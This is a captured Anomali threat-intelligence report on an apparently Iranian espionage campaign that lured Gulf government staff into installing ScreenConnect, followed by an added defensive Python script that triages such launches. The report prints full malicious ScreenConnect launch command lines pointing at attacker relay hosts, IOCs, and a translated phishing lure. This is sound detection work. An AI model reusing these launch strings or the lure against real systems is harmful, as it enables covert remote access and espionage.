www.anomali.com
52.17.119.105
Public Scan
URL:
https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-ua...
Submission: On April 24 via manual from US — Scanned from DE
Learn More ANOMALI AT WORK Anomali Press Room Events Detect LIVE Leadership Reviews Awards GET IN TOUCH Contact Us Request a Demo Careers Schedule Demo en English Español Français Italiano February 10, 2021 - Anomali Threat Research , PROBABLE IRANIAN CYBER ACTORS, STATIC KITTEN, CONDUCTING CYBERESPIONAGE CAMPAIGN TARGETING UAE AND KUWAIT GOVERNMENT AGENCIES Research <h3>ScreenConnect Remote Access Tool Utilizing Ministry of Foreign Affairs-Themed EXEs and URLs</h3> <p><em>Authored by: Gage Mele, Winston Marydasan, and Yury Polozov</em></p> <h2>Key Findings</h2> <ul> <li>Anomali Threat Research identified a campaign targeting government agencies in the United Arab Emirates (UAE) and likely the broader Middle East.</li> <li>We assess with medium confidence that the activity is being conducted by Iran-nexus cyberespionage group Static Kitten, due to Israeli geopolitical-themed lures, Ministry of Foreign Affairs (MOFA) references, and the use of file-storage service Onehub that was attributed to their previous campaign known as Operation Quicksand.<sup>[1]</sup></li> <li>The objective of this activity is to install a remote management tool called ScreenConnect (acquired by ConnectWise 2015) with unique launch parameters that have custom properties.</li> <li>Malicious executables and URLs used in this campaign are masquerading as the Ministry of Foreign Affairs (MOFA) of Kuwait (mofa.gov[.]kw).</li> <li>Another sample, including only MOFA (mfa.gov), could be used for broader government targeting.</li> </ul> <h2>Overview</h2> <p>Anomali Threat Research has uncovered malicious activity very likely attributed to the Iran-nexus cyberespionage group, Static Kitten (Seedworm, MERCURY, Temp.Zagros, POWERSTATS, NTSTATS, MuddyWater), which is known to target numerous sectors primarily located in the Middle East.<sup>[2]</sup> This new campaign, which uses tactics, techniques, and procedures (TTPs) consistent with previous Static Kitten activity, uses ScreenConnect launch 
parameters designed to target any MOFA with <strong>mfa[.]gov</strong> as part of the custom field. We found samples specifically masquerading as the Kuwaiti government and the UAE National Council respectively, based on references in the malicious samples.</p> <p>In mid-2020, the UAE and Israel began the process of normalizing relations. Since then, tensions have further escalated in the region, as reported by numerous sources. The targeting of Kuwait could be tied to multiple factors, including Kuwait’s MOFA making a public statement that they were willing to lead mediation between Iran and Saudi Arabia.<sup>[3]</sup> Furthermore, in October 2020, trade numbers for a peace deal between Israel and UAE included an estimate for the creation of 15,000 jobs and $2 billion in revenue on each side.<sup>[4]</sup> In that same month, Static Kitten reportedly conducted Operation Quicksand, which targeted prominent Israeli organizations and included the use of file-storage service OneHub.<sup>[5]</sup></p> <h2>Details</h2> <p>We identified two lure ZIP files being used by Static Kitten designed to trick users into downloading a purported report on relations between Arab countries and Israel, or a file relating to scholarships. 
The URLs distributed through these phishing emails direct recipients to the intended file storage location on Onehub, a legitimate service known to be used by Static Kitten for nefarious purposes.[6] Anomali Threat Research has identified that Static Kitten is continuing to use Onehub to host a file containing ScreenConnect.</p> <p>The delivery URLs found to be part of this campaign are:</p> <ul> <li>ws.onehub[.]com/files/7w1372el</li> <li>ws.onehub[.]com/files/94otjyvd</li> </ul> <p>File names in this campaign include:</p> <ul> <li>تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.ZIP</li> <li>تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.exe</li> <li>الدراسیة .zip</li> <li>الدراسیة .exe</li> <li>مشروع .docx</li> </ul> <p>Translated file names</p> <ul> <li>Analysis and study of the normalization of relations between the Arab countries and Israel httpsmod.gov.kw.zip</li> <li>Analysis and study of the normalization of relations between the Arab countries and Israel httpsmod.gov.kw.exe</li> <li>Scholarships.zip</li> <li>Scholarships.exe</li> <li>Project.docx</li> </ul> <p>Static Kitten’s objective is to direct users to a downloader URL (<strong>ws.onehub[.]com/files/7w1372el</strong> which downloads a ZIP file) via a phishing email that impersonates an EXE (<strong>تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.exe</strong>). This EXE purports to be a report on Arabic countries and Israel relations but, when executed, actually launches the installation process for ScreenConnect.</p> <p>A similar second sample uses .docx file that tries to direct users to <strong>ws.onehub[.]com/files/94otjyvd</strong> which downloads a ZIP file called <strong>لدراسیة .zip</strong>. An EXE inside the ZIP of the same name will also begin the ScreenConnect installation process when executed. 
An overview of the infection chain is shown in Figure 1below.</p> <p style="text-align: center;"><em><strong><img alt="Static Kitten Campaign Infection Chain" src="https://cdn.filestackcontent.com/qoDoJNyyRbmVT4P2Ordu"/><br/> Figure 1</strong> - Static Kitten Campaign Infection Chain</em></p> <h3>Lure Document Analysis</h3> <p>Static Kitten is distributing at least two URLs that deliver two different ZIP files that are themed to be relevant to government agency employees. The URLs are distributed through phishing emails with lure and decoy documents. An example lure is shown in Figure 2 below.</p> <p style="text-align: center;"><em><strong><img alt="Static Kitten Lure Document" src="https://cdn.filestackcontent.com/9taUbRQcTcGEQYAYxR1i"/><br/> Figure 2</strong> – Static Kitten Lure Document .docx</em></p> <p>The .docx file shown in Figure 2 directly refers to government agency recipients while highlighting concerns about recent Iranian actions, the impact of the US elections, and joint studies by government entities on relations between Arabic countries and Israel. The actors reference multiple official agencies, including the General Secretariat of the Cooperation Council for the Arab States of the Gulf and the UAE National Media Council, likely in an effort to add the appearance of legitimacy. A full translation of this document can be viewed in Appendix A. The hyperlink in the .docx file is impersonating the UAE National Media Council, however, the actual link directs to <strong>ws.onehub.com/files/7w1372el</strong>.</p> <p>The second file is a ZIP called الدراسیة .zip (see Figure 3). We cannot determine the delivery method for this ZIP, but it is likely similar to the .docx email delivery method of the first download URL. 
The geopolitical-themed ZIP contains an EXE file with the same name that begins the installation process for ScreenConnect when executed (see Figure 4).</p> <p style="text-align: center;"><em><strong><img alt="Download URL ws.onehub.com/files/94otjyvd for Malicious ZIP الدراسیة .zip" src="https://cdn.filestackcontent.com/JSr3TyJBQJisFMwSeyTa"/><br/> Figure 3</strong> – Download URL <strong>ws.onehub.com/files/94otjyvd</strong> for Malicious ZIP <strong>الدراسیة .zip</strong></em></p> <p style="text-align: center;"><em><strong><img alt="ScreenConnect Installation" src="https://cdn.filestackcontent.com/HLvJBIh5Tp6JP05cEbNw"/><br/> Figure 4</strong> - ScreenConnect Installation</em></p> <h2>Technical Analysis</h2> <h3>ScreenConnect and OneHub Context</h3> <p>Between 2016 and 2020, we have seen ScreenConnect and Onehub used in malicious cyber activity by different, unassociated threat actors. For example, between 2016 and 2019 unknown threat actors targeted IT outsourcing firms, including compromising US-based Cognizant and India-based Wipro.<sup>[7]</sup> The actors responsible for these attacks used ScreenConnect to connect to endpoints on client networks, enabling them to conduct further lateral movement and automated actions on objectives. During an incident impacting Cognizant and their client Maritz Holdings, actors used ScreenConnect to propagate to other connected systems and caused over $1.8 million (USD) in losses through a gift card fraud scheme.<sup>[6]</sup> In 2019, another threat group used ConnectWise to execute PowerShell commands in their target environments. 
This led to the delivery of Zeppelin and other VegaLocker ransomware variants, the Vidar information stealer, Cobalt Strike beacons, PS2EXE tools, and banking Trojans.<sup>[7]</sup> In 2020, ScreenConnect/ConnectWise was utilized by the cybercriminal group Pinchy Spider (GOLD SOUTHFIELD, GOLD GARDEN, Sodinokibi, REvil, GandCrab) to distribute Sodinokibi ransomware.<sup>[8]</sup></p> <p>Remote desktop management software is a common target and tool for threat actors because of the wide variety of functionality it offers. ScreenConnect offers three primary functions, each containing different features valuable to threat actors. ScreenConnect’s capabilities are shown in Table 1 below.</p> <p style="text-align: center;"><em><strong>Table 1</strong> - ScreenConnect Capabilities</em><sup>[9]</sup></p> <table class="table table-striped"> <thead> <tr> <th>Feature</th> <th>Functions</th> </tr> </thead> <tbody> <tr> <td>Remote Support</td> <td>Remote control and viewing of any internet-connected device.</td> </tr> <tr> <td>Unattended Access</td> <td>Persistent connection allowing behind-the-scenes remote control of any machine or server.</td> </tr> <tr> <td>Meetings</td> <td>Standard screen-sharing meetings with chat and voice communication, video recording, and screenshot capture.</td> </tr> </tbody> </table> <p>The cybercriminal group Graceful Spider (TA505, Gold Evergreen, TEMP.Warlock, Hive0065, Chimborazo, FIN11) distributed spearphishing emails impersonating Onehub in 2019 in attempts to trick users into downloading the SDBbot remote access trojan (RAT).<sup>[10]</sup> Onehub’s file-storage services are also used in malspam emails to host various malware, as is common with other file storage locations abused by multiple threat actors.</p> <h3>First Executable</h3> <p>تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod.gov.kw.exe</p> <p>When a user double-clicks the executable <strong>تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod.gov.kw.exe</strong> 
(the ScreenConnect payload), it drops a Microsoft Installer file. This begins the installation of the client payload onto the victim machine. While the actors attempted to make the installation appear legitimate, closer inspection of the client launch parameters reveals the potential for broader MOFA targeting. The client service launch parameters are:</p> <div class="break-word"> <p>"C:\Program Files (x86)\ScreenConnect Client (a97eeae2330a1851)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-uwct38-relay.screenconnect.com&p=443&s=defc756e-8027-47b6-b67f-400b5152b0f9&k=BgIAAACkAABSU0ExAAgAAAEAAQAtuFTxmBL02KmPrJD46iRMPemIxmEf5ugjlUMfa193CjLMeH9pna2eM0ZGHYhe3MZHUEAByA4fhpInP5kKnkrPl%2fjhxwjHSIaKZ%2bMobL27iSLf8tgmCtGJTTZndViJcMcp4v0yqJOMxVuUdPraZ%2fTvrw6wZpECq7LCGncZGOri%2fqQVFUqsIDZZzhQye6zfkCg0DgxxPf4aQzjgqQo20dJeQDIEEb0sy7FPiSde3VVxTmp%2fMB3Ho%2bK3mobu743glaeTOq0aIsvXASRKb5xB1f4pFUMi1mETUoGgWL%2f6qhNk65scRZmECWvs7O8ajulQMiSPQj9lUOejdBR9taEB8Byz&t=&c=mofa&c=mofa.gov.kw&c=mofa&c=pc&c=&c=&c=&c="</p> </div> <p>While the ScreenConnect client agent is being installed, the server component expects a connection and can identify the client agent through a public key thumbprint. 
The thumbprint is a 16-character string embedded in the install path "C:\Program Files (x86)\ScreenConnect Client (<strong>a97eeae2330a1851</strong>)".</p> <p>Analysis of the authentic launch parameters passed back to the server as part of ScreenConnect functionality is shown in Table 2 below.</p> <p style="text-align: center;"><em><strong>Table 2 </strong>- ScreenConnect Launch Parameters</em></p> <table class="table table-striped break-word"> <thead> <tr> <th>Launch Parameter</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>e=Access</td> <td>Session type: access, meet, support.</td> </tr> <tr> <td>y=Guest</td> <td>ProcessType (Guest or Host).</td> </tr> <tr> <td>h=instance-sy9at2-relay.screenconnect.com</td> <td>URI to reach the server’s relay service.</td> </tr> <tr> <td>p=443</td> <td>Port on which the relay service operates.</td> </tr> <tr> <td>s=6a1e6739-ad4f-4759-8c69-dfe896b9a817</td> <td>The GUID that identifies the client.</td> </tr> <tr> <td>k=BgIAAACkAABSU0ExAAgAAAEAAQCVzMmjXhdfu5xyqTHPWDSj9Qjbq%2bQlIQursvinhHWO9UWKiTPrrR7quzVCpids4AagFWBCbS6cfow4bTxdtZyrd%2fNQQRVUcQ%2f%2boszJVH6S1JEpmF6ZPruFKyy1yr%2fEuxhNcHAWNf0CQKhhVsK0rXVlRE%2b4%2f4v%2fk%2f7%2bHPg2kwhmBHFZTJVd7xADVdVuYESMiCmu4gx8Akf9aAE2RUz9LjSiCU6LwJtp4AjjMCaGLFSaragsfZ1e%2fD9UEEee8n0J69HLcLoY%2fW8w8RKqQXILC9S3ONSkepA4UHcptKwP5GXogluNbG7UdgiaynRL%2b31oTHOZ32giSoxHDGHc3WphKwDv</td> <td>The encoded encryption key used to verify the client’s identity.</td> </tr> <tr> <td>&t</td> <td>Not defined here; it is the NameCallback format, used if a session name is to be given.</td> </tr> </tbody> </table> <p>The main launch parameters indicating that this EXE is designed to target MOFAs are the custom c parameters:</p> <ul> <li>&c=mofa</li> <li>&c=mofa.gov.kw</li> </ul> <p>These parameters carry predefined properties that let an actor know which target has been infected, and from where. 
In this example the infected target is MOFA.</p> <h3>Second Executable</h3> <p>المنح الدراسیة .exe</p> <p>The ScreenConnect launch parameters from المنح الدراسیة .exe are shown below:</p> <div class="break-word"> <p>"C:\Program Files (x86)\ScreenConnect Client (03b9d0ec9210f109)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-sy9at2-relay.screenconnect.com&p=443&s=6a1e6739-ad4f-4759-8c69-dfe896b9a817&k=BgIAAACkAABSU0ExAAgAAAEAAQCVzMmjXhdfu5xyqTHPWDSj9Qjbq%2bQlIQursvinhHWO9UWKiTPrrR7quzVCpids4AagFWBCbS6cfow4bTxdtZyrd%2fNQQRVUcQ%2f%2boszJVH6S1JEpmF6ZPruFKyy1yr%2fEuxhNcHAWNf0CQKhhVsK0rXVlRE%2b4%2f4v%2fk%2f7%2bHPg2kwhmBHFZTJVd7xADVdVuYESMiCmu4gx8Akf9aAE2RUz9LjSiCU6LwJtp4AjjMCaGLFSaragsfZ1e%2fD9UEEee8n0J69HLcLoY%2fW8w8RKqQXILC9S3ONSkepA4UHcptKwP5GXogluNbG7UdgiaynRL%2b31oTHOZ32giSoxHDGHc3WphKwDv&t=&c=mfa&c=mfa.gov&c=mfa&c=pc&c=&c=&c=&c="</p> </div> <p>The actors again created custom field parameters; however, these are kept to generic MOFA targeting, which appears as MFA:</p> <ul> <li>&c=mfa&c=mfa.gov</li> </ul> <h2>Conclusion</h2> <p>Utilizing legitimate software for malicious purposes can be an effective way for threat actors to obfuscate their operations. In this latest example, Static Kitten is very likely using features of ScreenConnect to steal sensitive information or download malware for additional cyber operations. 
As Static Kitten is assessed to be primarily focused on cyberespionage, it is very likely that data theft is the primary objective behind propagating ScreenConnect to government agency employees.</p> <p>We will continue monitoring this group for additional malicious activity and provide details when appropriate.</p> <h2>MITRE TTPs</h2> <p>Masquerading - T1036<br/> Phishing - T1566<br/> Remote Access Software - T1219<br/> Spearphishing Attachment - T1566.001<br/> Spearphishing Link - T1566.002<br/> User Execution - T1204<br/> User Execution: Malicious File - T1204.002</p> <h2>Endnotes</h2> <p><sup>[1]</sup> ClearSky Cyber Security, “Operation Quicksand: Muddywater’s Offensive Attack Against Israeli Organizations,” ClearSky, accessed February 8, 2021, published October 2020, https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf, 3.</p> <p><sup>[2]</sup> “MuddyWater,” MITRE, accessed February 8, 2021, https://attack.mitre.org/groups/G0069/.</p> <p><sup>[3]</sup> “Kuwait willing to mediate between Iran and Saudi,” Middle East Monitor, accessed February 8, 2021, published February 4, 2021, https://www.middleeastmonitor.com/20210204-kuwait-willing-to-mediate-between-iran-and-saudi/.</p> <p><sup>[4]</sup> Attila Shumelby, “Intelligence Minister Eli Cohen: Netanyahu secretly visited other countries besides the Emirates,” Ynet, accessed February 8, 2021, published September 9, 2020, https://www.ynet.co.il/news/article/S1v00IFsXP; Jonathan Josephs, “Israel-UAE peace deal ‘big’ for trade in Middle East,” BBC News, accessed February 8, 2021, published October 16, 2020, https://www.bbc.com/news/business-54574022.</p> <p><sup>[5]</sup> ClearSky Cyber Security, “Operation Quicksand: Muddywater’s Offensive Attack Against Israeli Organizations,” ClearSky, 23.</p> <p><sup>[6]</sup> Ibid.</p> <p><sup>[7]</sup> “Wipro Intruders Targeted Other Major IT Firms,” KrebsOnSecurity, accessed February 8, 2021, published April 18, 2019, 
https://krebsonsecurity.com/2019/04/wipro-intruders-targeted-other-major-it-firms/#more-47453.</p> <p><sup>[8]</sup> Ibid.</p> <p><sup>[8]</sup> Alon Groisman, “Connectwise Control Abused Again to Deliver Zeppelin Ransomware,” Morphisec Blog, accessed February 8, 2021, published December 18, 2019, https://blog.morphisec.com/connectwise-control-abused-again-to-deliver-zeppelin-ransomware.</p> <p><sup>[9]</sup> “CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS,” Tetra Defense, accessed February 8, 2021, https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis/.</p> <p><sup>[9]</sup> “Now Let’s Get Tech-y: ScreenConnect’s three main product components create a trio of powerful remote functionality,” ConnectWise Control, accessed February 8, 2021, https://www.screenconnect.com/Remote-Support?t=2&t=2#:~:text=ScreenConnect%20is%20a%20fully%20functional,remote%20support%20on%20the%20fly.</p> <p><sup>[10]</sup> Dennis Schwarz, et al., “TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader,” Proofpoint, accessed February 8, 2021, published October 16, 2019, https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader.</p> <h2>IOCs</h2> <p><strong>Docx</strong><br/> 31a35e3b87a7f81449d6f3e195dc0660b5dae4ac5b7cd9a65a449526e8fb7535</p> <p><strong>EXE</strong><br/> 3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32b<br/> 5bfb635c43eb73f25f4e75961a715b96fa764bbe096086fc1e037a7869c7878b</p> <p><strong>IP</strong><br/> 149.202.216.53</p> <p><strong>URL</strong><br/> https://ws.onehub.com/files/94otjyvd<br/> https://ws.onehub.com/files/7w1372el<br/> instance-sy9at2-relay.screenconnect.com<br/> instance-uwct38-relay.screenconnect.com</p> <p><strong>ZIP</strong><br/> b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf<br/> 77505dcec5d67cc0f6eb841f50da7e7c41a69419d50dc6ce17fffc48387452e1</p> <h2>Appendix A</h2> <p>Gentlemen / employees of 
government agencies</p> <p>Happy New Year</p> <p>After a kind greeting ,,,</p> <p>In view of the situation in the region, especially after the US elections, and concerns about Iran's actions, joint studies have been conducted between the National Media Council and the General Secretariat of the Cooperation Council for the Arab States of the Gulf on counting the political, security and economic consequences of the normalization of relations between Arab countries and Israel. Consequently, the draft studies on negotiations on the normalization of relations between Arab countries and Israel were presented by experts of the member states of the General Secretariat of the Cooperation Council for the Arab States of the Gulf, and in this regard, the National Media Council seeks to conduct a comprehensive survey by the member states.</p> <p>Download the relevant content via the link below.</p> <p>Analysis and study / normalization of relations / Arab countries and Israel / https://nmc.gov.ae</p> <p>Yours sincerely</p>
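<p>The following Python script is an added example written for this report; it is not Anomali's tooling or ScreenConnect's own code. It parses the ScreenConnect client launch parameters analysed in Table 2 and in the First Executable and Second Executable sections, extracting the public key thumbprint from the install path, the relay host, session GUID and the ordered custom <code>c</code> properties, and then triages each launch from a defender's view: the relay host is compared against the two relay instances in the IOC list and against an allowlist of the organisation's own instance, and custom properties that name a foreign-affairs ministry (mofa/mfa) are reported. The two malicious command lines reproduce the report's parameters with the long <code>k=</code> public keys replaced by a placeholder; the approved relay <code>instance-example-relay.screenconnect.com</code>, the benign third command line and the fourth unrelated line are constructed assumptions.</p>

```python
"""Parse and triage ScreenConnect client launch parameters from process
command lines (e.g. Sysmon Event ID 1).  Added example; not Anomali tooling."""
import re
from urllib.parse import parse_qs

# Relay hosts listed in the report's IOC section.
KNOWN_BAD_RELAYS = frozenset({
    "instance-sy9at2-relay.screenconnect.com",
    "instance-uwct38-relay.screenconnect.com",
})

# Hypothetical: the relay instance an organisation legitimately uses.
APPROVED_RELAYS = frozenset({"instance-example-relay.screenconnect.com"})

# 16-hex-character public key thumbprint embedded in the client install path.
THUMBPRINT_RE = re.compile(r"ScreenConnect Client \(([0-9a-fA-F]{16})\)")
# The launch argument is a double-quoted query string that begins with '?'.
ARG_RE = re.compile(r'"\?([^"]*)"')
# Custom c= values that name a foreign-affairs ministry, as seen in the report.
MINISTRY_TAG_RE = re.compile(r"\b(mofa|mfa)\b", re.IGNORECASE)

# Constructed process-creation records.  The first two reproduce the image
# path and launch arguments from the report, with the long k= public keys
# replaced by a placeholder because the parser treats them as opaque.  The
# third is a hypothetical benign install against the approved relay; the
# fourth is unrelated noise the scanner must skip.
SAMPLE_COMMAND_LINES = [
    r'"C:\Program Files (x86)\ScreenConnect Client (a97eeae2330a1851)\ScreenConnect.ClientService.exe" '
    r'"?e=Access&y=Guest&h=instance-uwct38-relay.screenconnect.com&p=443'
    r'&s=defc756e-8027-47b6-b67f-400b5152b0f9&k=PLACEHOLDER_KEY&t='
    r'&c=mofa&c=mofa.gov.kw&c=mofa&c=pc&c=&c=&c=&c="',
    r'"C:\Program Files (x86)\ScreenConnect Client (03b9d0ec9210f109)\ScreenConnect.ClientService.exe" '
    r'"?e=Access&y=Guest&h=instance-sy9at2-relay.screenconnect.com&p=443'
    r'&s=6a1e6739-ad4f-4759-8c69-dfe896b9a817&k=PLACEHOLDER_KEY&t='
    r'&c=mfa&c=mfa.gov&c=mfa&c=pc&c=&c=&c=&c="',
    r'"C:\Program Files (x86)\ScreenConnect Client (0123456789abcdef)\ScreenConnect.ClientService.exe" '
    r'"?e=Access&y=Guest&h=instance-example-relay.screenconnect.com&p=443'
    r'&s=00000000-0000-4000-8000-000000000000&k=PLACEHOLDER_KEY&t='
    r'&c=helpdesk&c=corp-laptops&c=&c=&c=&c=&c=&c="',
    r'"C:\Windows\System32\notepad.exe" C:\Users\analyst\notes.txt',
]


def parse_screenconnect_cmdline(cmdline: str) -> dict:
    """Extract the thumbprint, session fields and ordered custom c= values.

    Raises ValueError for command lines that are not a ScreenConnect client launch.
    """
    thumb = THUMBPRINT_RE.search(cmdline)
    arg = ARG_RE.search(cmdline)
    if not thumb or not arg:
        raise ValueError("not a ScreenConnect client launch command line")
    # keep_blank_values preserves the empty c= slots, so positions stay intact.
    fields = parse_qs(arg.group(1), keep_blank_values=True)

    def first(key: str) -> str:
        return fields.get(key, [""])[0]

    return {
        "thumbprint": thumb.group(1),
        "session_type": first("e"),
        "process_type": first("y"),
        "relay_host": first("h"),
        "relay_port": first("p"),
        "session_guid": first("s"),
        "custom_properties": fields.get("c", []),
    }


def assess(parsed: dict, approved_relays=frozenset()) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    host = parsed["relay_host"]
    if host in KNOWN_BAD_RELAYS:
        findings.append(f"relay host {host} is a reported IOC")
    elif host not in approved_relays:
        findings.append(f"relay host {host!r} is not an approved ScreenConnect instance")
    tags = [c for c in parsed["custom_properties"] if MINISTRY_TAG_RE.search(c)]
    if tags:
        findings.append("custom properties tag a ministry target: " + ", ".join(tags))
    return findings


def scan(command_lines, approved_relays=frozenset()) -> list:
    """Triage every ScreenConnect client launch in a batch of command lines."""
    results = []
    for line in command_lines:
        try:
            parsed = parse_screenconnect_cmdline(line)
        except ValueError:
            continue  # not a ScreenConnect client launch
        results.append((parsed["thumbprint"], parsed["relay_host"],
                        assess(parsed, approved_relays)))
    return results


if __name__ == "__main__":
    for thumb, host, findings in scan(SAMPLE_COMMAND_LINES, APPROVED_RELAYS):
        status = "ALERT" if findings else "ok"
        print(f"{status:5} {thumb} {host}: {'; '.join(findings) or 'approved instance'}")
```

<p>An organisation that does not use ScreenConnect at all can drop the allowlist and alert on any <code>ScreenConnect.ClientService.exe</code> launch; one that does should populate <code>APPROVED_RELAYS</code> with its own instance so that only foreign relays, such as the two in the IOC list, are raised. The <code>c</code> values are kept in order because the report shows the actor using fixed positions (name, domain, name, machine type) to label victims.</p>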